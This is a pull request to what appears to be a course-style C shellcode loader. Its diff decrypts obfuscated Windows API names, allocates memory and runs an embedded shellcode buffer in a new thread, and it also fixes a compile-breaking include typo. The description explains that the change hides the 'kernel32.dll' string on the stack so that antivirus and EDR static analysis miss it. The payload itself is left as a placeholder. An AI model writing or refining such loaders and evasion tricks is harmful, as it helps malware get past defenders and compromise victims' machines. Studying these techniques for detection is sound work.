### PR TITLE
fixed syntax error and program evasiveness

### DIFF
--- a/Part 1/shellcode.c
+++ b/Part 1/shellcode.c
@@ -1,4 +1,4 @@
-clude <windows.h>
+#include <windows.h>
 #include <stdio.h>
 #include <stdlib.h>
 #include <string.h>
@@ -72,13 +72,14 @@ int main(void) {
   // Shellcode
   char another_encry [] = "HarrietIsAGoodDog";
   char saekey [] =  FILL IN YOURSELF
+  const char k32DllName[13] = { 'k', 'e', 'r', 'n', 'e', 'l', '3', '2', '.', 'd', 'l', 'l', 0x0 };
 
   unsigned char loadme[] = FILL IN YOURSELF
 
   unsigned int loadme_len = sizeof(loadme);
   
   AnotherEncryption((char *) VirtAlloc, sizeof (VirtAlloc), another_encry, sizeof(another_encry));
-  pVirtualAlloc= GetProcAddress(GetModuleHandle("kernel32.dll"), VirtAlloc);
+  pVirtualAlloc= GetProcAddress(GetModuleHandle(k32DllName), VirtAlloc);
   
   cexe = pVirtualAlloc(0, loadme_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
   
@@ -90,13 +91,13 @@ int main(void) {
   
   AnotherEncryption((char *) CreatThr, sizeof (CreatThr), another_encry, sizeof(another_encry));
   
-  pCreateThread= GetProcAddress(GetModuleHandle("kernel32.dll"), CreatThr);
+  pCreateThread= GetProcAddress(GetModuleHandle(k32DllName), CreatThr);
      
   ht = pCreateThread(0, 0, (LPTHREAD_START_ROUTINE)cexe, 0, 0, 0);
     
   AnotherEncryption((char *) WaitMe, sizeof (WaitMe), another_encry, sizeof(another_encry));
   
-  pWaitForSingleObject= GetProcAddress(GetModuleHandle("kernel32.dll"), WaitMe);
+  pWaitForSingleObject= GetProcAddress(GetModuleHandle(k32DllName), WaitMe);
   
   pWaitForSingleObject(ht, -1);
 }


### PR DESCRIPTION
I replaced the string literal `"kernel32.dll"` with a stack allocated string / character array to hinder static analysis done by AV/EDRs which can improve on the evasiveness of the PE file as the strings are only available at runtime and not stored in the `.rdata` section of the PE file as is with hardcoded string literals.

i also fixed a typo that was preventing the file from including the `windows.h` file required for compilation